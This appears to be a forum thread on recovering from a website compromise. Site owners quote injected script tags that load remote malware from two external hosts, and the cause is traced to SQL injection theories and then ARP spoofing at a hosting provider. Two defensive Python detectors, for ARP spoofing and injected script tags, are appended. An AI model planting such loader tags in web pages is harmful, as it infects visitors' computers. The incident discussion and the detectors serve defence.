Thread: Recovery steps for hacked Website!

  1. #1
    Registered User

    Status
    Offline
    Join Date
    Nov 2007
    Posts
    21
    Thanks
    0
    Thanked 0 Times in 0 Posts


    Hi,

    Yesterday, my server got hacked and the hackers inserted JavaScript badware (the inserted script is <script language=javascript src=http://telecom.dgnet.net/images/pen.gif></script>). This script was spreading malicious software onto users' systems. After a few hours Google detected the same and marked our site as "THIS SITE MAY HARM YOUR COMPUTER" in the search results (SERP). My traffic is totally gone after this.

    Can you please suggest how I can recover from this ASAP, as our site is an ecommerce website and we are losing revenue on a per-minute basis. Also, many other websites are hosted on that server. Can we stop Googlebot or other robots and instruct them to come back later, so that the search engine bots can't mark our sites as "THIS SITE MAY HARM YOUR COMPUTER"?

    Thanks for your time reading this and replying with appropriate solutions.

    Regards,
    SEMPro

  2. #2
    Typing with both fingers.

    Status
    Offline
    Join Date
    Aug 2003
    Location
    Allt Y Coed Farm, North Pembrokeshire
    Posts
    4,123
    Thanks
    247
    Thanked 198 Times in 157 Posts
    I had the same just before last chrimbo.

    I did the same as you and removed the threat then filed for a re-inclusion request in google webmaster tools. It went in a week and a half.

    Sit tight - clean your pants and re-apply to google for a review and maybe check stopbadware.org for anymore information.

    Ta

    Baz

  3. #3
    Dynamoo's Avatar
    Mooooo

    Status
    Offline
    Join Date
    Dec 2003
    Location
    Somewhere in Bedfordshire
    Posts
    1,908
    Thanks
    5
    Thanked 60 Times in 43 Posts
    Of course, you need to fix the underlying problem which I am guessing is a SQL Injection attack or something similar.

    You will need to sign up to Google's Webmaster Tools first. That's useful anyway for a big site, then file the reinclusion request from there. Google have a guide here.

    But you MUST fix the underlying problem, either by ensuring that all your applications are up to date or by making sure that your SQL inputs are sanitised. That might require you to hire a programmer, unfortunately.
    Never email donotemail@WeAreSpammers.com

  4. #4
    Registered User

    Status
    Offline
    Join Date
    Feb 2009
    Posts
    3
    Thanks
    0
    Thanked 0 Times in 0 Posts
    I am suffering the same problem, as of today (2009-02-25). All of my static .html pages have the following at the beginning:
    <script language=javascript src=http://telecom.dgnet.net/images/pen.gif></script>
    I have a Windows 2003 server.

    I'm not having any joy detecting what is causing it. Tried a virus scan and the latest version of the Microsoft Windows Malicious Software Removal Tool, but no joy.

    There are also some entries in the event log from Source "named" with a Description along the lines of "client query (cache) './NS/IN' denied". I think this is some kind of DoS attack.

    Any help greatly appreciated!

  5. #5
    Dynamoo's Avatar
    Mooooo

    Status
    Offline
    Join Date
    Dec 2003
    Location
    Somewhere in Bedfordshire
    Posts
    1,908
    Thanks
    5
    Thanked 60 Times in 43 Posts
    A bit of Googling indicates that these sites are a combination of ASP / SQL / Windows. This type of attack is often carried out by the (possibly Russian) Asprox crew, but in this case it looks like a Chinese wannabe gang who copy them.

    A bit of Googling around the terms asp asprox sql might yield some useful results, given that you know your back-end architecture. Also, do some Googling for sql injection. Don't forget to look at the ads, as some of those are highly relevant.

    Ultimately, the root cause of the problem is that you are allowing SQL to be entered through a URL. The bad guys are probably sending a variety of bad URLs to your system (check your error logs) in order to find one that works.

    I cannot stress this easily enough: you need to sanitise your SQL inputs. If you don't fix this, then you will get hit again and again, especially now that the bad guys know that your site is vulnerable. Google for sanitize sql for some tips.
    Never email donotemail@WeAreSpammers.com

  6. #6
    Registered User

    Status
    Offline
    Join Date
    Feb 2009
    Posts
    3
    Thanks
    0
    Thanked 0 Times in 0 Posts
    Thanks for the info. It's weird as none of my sites actually use ASP/SQL Server. They are all static HTML.

    Any ideas other than a SQL injection?

    I'm trawling through the logs, but nothing thus far.

  7. #7
    Dynamoo's Avatar
    Mooooo

    Status
    Offline
    Join Date
    Dec 2003
    Location
    Somewhere in Bedfordshire
    Posts
    1,908
    Thanks
    5
    Thanked 60 Times in 43 Posts
    Quote Originally Posted by walkthewalk View Post
    Thanks for the info. It's weird as none of my sites actually use ASP/SQL Server. They are all static HTML.

    Any ideas other than a SQL injection?

    I'm trawling through the logs, but nothing thus far.
    Well that blows my theory right out of the water! And now that I re-read your post I can see that you were saying static HTML.

    I still think that it might be an ASP attack - this is an MS scripting tool used for creating active server pages. You could try disabling ASP (see this howto).

    Do you generate HTML directly on the server somehow, or do you upload it from another source? Disabling ASP (plus any other extensions) and re-uploading the HTML might clear it.

    Disclaimer: I do work in IT security, but typically endpoint rather than servers.
    Never email donotemail@WeAreSpammers.com

  8. #8
    Registered User

    Status
    Offline
    Join Date
    Feb 2009
    Posts
    1
    Thanks
    0
    Thanked 0 Times in 0 Posts
    Quote Originally Posted by walkthewalk View Post
    Thanks for the info. It's weird as none of my sites actually use ASP/SQL Server. They are all static HTML.

    Any ideas other than a SQL injection?

    I'm trawling through the logs, but nothing thus far.
    I had the same annoying issue yesterday.
    I scanned my Windows 2003 server with 3 antiviruses, without finding any infection.
    If you change the HTTP port from 80 to anything else, you will see that the malicious code is not added anymore.
    I think the problem is related to an ARP poisoning attack.
    Question: Do you have any other machines on the same broadcast (layer 2) network?
    You should check the other machines and your ARP table :-(

  9. #9
    Registered User

    Status
    Offline
    Join Date
    Feb 2009
    Posts
    3
    Thanks
    0
    Thanked 0 Times in 0 Posts
    Ok, problem solved. Basically my hosting provider got hacked. It wasn't actually my server. So I wasted hours looking for something malicious on my box. After lots of emails to support and a couple of calls, I eventually got this:
    --------------------------------------------------------------------------------
    The issues with the virus warnings over the websites have been sorted out. It was indeed a network issue & was related to the ARP spoofing attack. One of our dedicated servers used the Gateway IP of the same subnet as your IPs & was using it to inject JavaScript code in our network. We have terminated that infected server as of now & have set up static ARP on the gateway on each box. We have also raised this issue with our router manufacturers for immediate protection against such things happening again in future.

    We do sincerely apologise for the entire incident & care has been taken that this doesn't happen again in the future.
    --------------------------------------------------------------------------------
    This script also got injected into the pages, in addition to what I previously mentioned.
    <script language=javascript src=http://www.jalasoft.com/images/ken.gif></script>
    The attack was clever enough to only show it on the first browser request too.

    If anyone's interested, my host is EUKHOST.
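The ARP-spoofing explanation in posts #8 and #9 (a neighbour on the same subnet answering for the gateway IP and rewriting port-80 responses) can be checked from the affected box itself. The following is an added example, not code from anyone in this thread: it parses Windows-style `arp -a` output and flags a gateway MAC that differs from a previously recorded known-good value, plus any MAC that claims more than one IP. The sample output, the 192.0.2.x addresses and the "expected" MAC are constructed.

```python
import re
from collections import defaultdict

# Constructed `arp -a` output in the Windows 2003 format. The MAC shown for the
# gateway is not the pinned one, and the same MAC also answers for another host
# on the subnet: exactly what a neighbour claiming the gateway IP looks like.
ARP_OUTPUT = """\
Interface: 192.0.2.10 --- 0x10003
  Internet Address      Physical Address      Type
  192.0.2.1             00-50-56-aa-bb-cc     dynamic
  192.0.2.77            00-50-56-aa-bb-cc     dynamic
  192.0.2.200           00-0c-29-11-22-33     dynamic
"""
GATEWAY_IP = "192.0.2.1"
# Hypothetical value, recorded when the gateway was known to be good. Once the
# provider has confirmed the real one, `arp -s <gateway ip> <mac>` pins it.
EXPECTED_GATEWAY_MAC = "00-1a-2b-3c-4d-5e"

ENTRY = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-f]{2}(?:-[0-9a-f]{2}){5})\s+(\w+)",
    re.IGNORECASE)

def parse_arp(output: str) -> dict:
    """Map IP -> lowercase MAC for every address line in `arp -a` output."""
    table = {}
    for line in output.splitlines():
        m = ENTRY.match(line)
        if m:
            table[m.group(1)] = m.group(2).lower()
    return table

def check_arp(table: dict, gateway_ip: str, expected_mac: str) -> list:
    """Return human-readable findings; an empty list means the table looks sane."""
    findings = []
    seen = table.get(gateway_ip)
    if seen is None:
        findings.append(f"no ARP entry for gateway {gateway_ip}")
    elif seen != expected_mac.lower():
        findings.append(f"gateway {gateway_ip} resolves to {seen}, expected {expected_mac.lower()}")
    # One MAC answering for several IPs is the other tell-tale of a spoofing host.
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            findings.append(f"MAC {mac} claims multiple IPs: {', '.join(sorted(ips))}")
    return findings

if __name__ == "__main__":
    for finding in check_arp(parse_arp(ARP_OUTPUT), GATEWAY_IP, EXPECTED_GATEWAY_MAC):
        print("WARNING:", finding)
```

On a live box, feed it the real `arp -a` output and a gateway MAC confirmed out-of-band by the provider; a clean table returns no findings.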

  10. #10
    Registered User

    Status
    Offline
    Join Date
    Feb 2005
    Posts
    127
    Thanks
    0
    Thanked 3 Times in 3 Posts
    Check your ftp logs as you may probably find that your login details have been compromised and the hacker simply uploaded an edited version of your file. Also check FrontPage access details and search your account for shell scripts.

    EDIT: Sorry I missed your last post.
    David
    meirhosting.net
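Posts #9 and #10 describe two different places the injected script can live: in the HTTP responses only (rewritten on the network, the files on disk untouched) or in the files themselves (uploaded over a compromised FTP/FrontPage login). This added example, not code from anyone in the thread, separates the two cases by comparing the bytes a client received with the file on disk and looking for external <script> tags whose src ends in an image extension, as both scripts quoted above do. The HTML samples are constructed; the hostnames are the ones quoted in the thread. Because post #9 notes the injection only appeared on the first request, the served copy must come from a fresh client.

```python
import re

# Constructed samples: what a fresh client received vs. the file on disk.
SERVED = (b'<script language=javascript src=http://telecom.dgnet.net/images/pen.gif></script>'
          b'<html><head><title>Shop</title></head><body>Welcome</body></html>')
ON_DISK = b'<html><head><title>Shop</title></head><body>Welcome</body></html>'

# External <script src=...> whose target ends in an image extension. Legitimate
# JavaScript is essentially never served as .gif/.jpg/.png, so this is a strong signal.
SUSPICIOUS_SCRIPT = re.compile(
    rb'<script[^>]*\bsrc=["\']?(?P<src>[^\s"\'>]+\.(?:gif|jpe?g|png|bmp))["\']?[^>]*>\s*</script>',
    re.IGNORECASE)

def find_injected_scripts(html: bytes) -> list:
    """Return the src URLs of suspicious external script tags found in `html`."""
    return [m.group('src').decode('ascii', 'replace') for m in SUSPICIOUS_SCRIPT.finditer(html)]

def classify(served: bytes, on_disk: bytes) -> dict:
    """Decide where the injection lives.

    'on_disk'    - the file itself carries the script: clean the file, check the
                   FTP/FrontPage logs and rotate those credentials (post #10).
    'in_transit' - only the served copy carries it: something on the network path
                   is rewriting responses, as in the ARP-spoofing case (post #9);
                   the file needs no cleaning, the network does.
    'clean'      - neither copy carries it.
    """
    served_hits = find_injected_scripts(served)
    disk_hits = find_injected_scripts(on_disk)
    if disk_hits:
        verdict = 'on_disk'
    elif served_hits:
        verdict = 'in_transit'
    else:
        verdict = 'clean'
    return {'verdict': verdict, 'served_srcs': served_hits, 'disk_srcs': disk_hits,
            'identical': served == on_disk}

if __name__ == "__main__":
    print(classify(SERVED, ON_DISK))
```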
